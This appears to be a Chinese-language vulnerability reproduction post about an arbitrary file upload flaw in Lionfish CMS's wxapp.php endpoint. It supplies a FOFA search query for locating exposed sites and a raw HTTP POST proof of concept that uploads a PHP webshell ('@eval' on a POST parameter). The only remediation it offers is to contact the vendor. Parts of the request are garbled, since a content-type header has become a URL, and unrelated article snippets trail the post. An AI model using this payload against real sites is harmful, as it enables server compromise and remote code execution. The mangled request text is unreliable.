【漏洞复现】狮子鱼CMS文件上传漏洞(wxapp.php)
2024年07月28日
•
Php
•
我要评论
狮子鱼CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
nx01 产品简介
狮子鱼cms(content management system)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
nx02 漏洞描述
狮子鱼cms wxapp.php文件存在任意文件上传漏洞,攻击者可能利用这个漏洞上传恶意文件并执行恶意代码。
nx03 产品主页
fofa-query: body="/seller.php?s=/public/login"

nx04 漏洞复现
poc:
post /wxapp.php?controller=goods.dopageupload http/1.1
host: {{hostname}}
content-type: multipart/form-data; boundary=----webkitformboundary8uaanmwagm4bqbss
------webkitformboundary8uaanmwagm4bqbss
content-disposition: form-data; name="upfile"; filename="test.php"
content-type: http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/gif
<?php @eval($_post['test']);?>
------webkitformboundary8uaanmwagm4bqbss--

nx05 修复建议
建议联系软件厂商进行处理。
相关文章:
-
-
PHP的优缺点 智能写作
因此,开发者在使用PHP进行开发时,需要格外注意安全性问题,加强代码审查和漏洞修复。这种跨平台的特性使得PHP的应用范围非常广泛,无论是在个人网站、企业网站还是...
[阅读全文]
-
PHP性能探讨 ai写作
值得注意的是,PHP的性能具有其独特的优势和劣势。虽然PHP在执行速度和内存管理方面存在一定的不足,但其简单易学、动态类型系统和强大的Web开发能力使得它仍然成...
[阅读全文]
-
queries和attention_weights的形状为(查询个数,“键-值”对个数)# values的形状为(查询个数,“键-值”对个数)…
-
通过物理测量预测鲍鱼的年龄。鲍鱼的年龄是通过将鲍鱼壳从锥体上切开、染色并通过显微镜计算环数来确定的。…
-
如何查询PHP漏洞 ai写作
然后,通过运行扫描工具,我们可以对网站进行全面的安全检测,并发现可能存在的PHP漏洞。为了及时了解PHP漏洞的最新信息,我们需要关注PHP官方网站、安全论坛和漏...
[阅读全文]
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
发表评论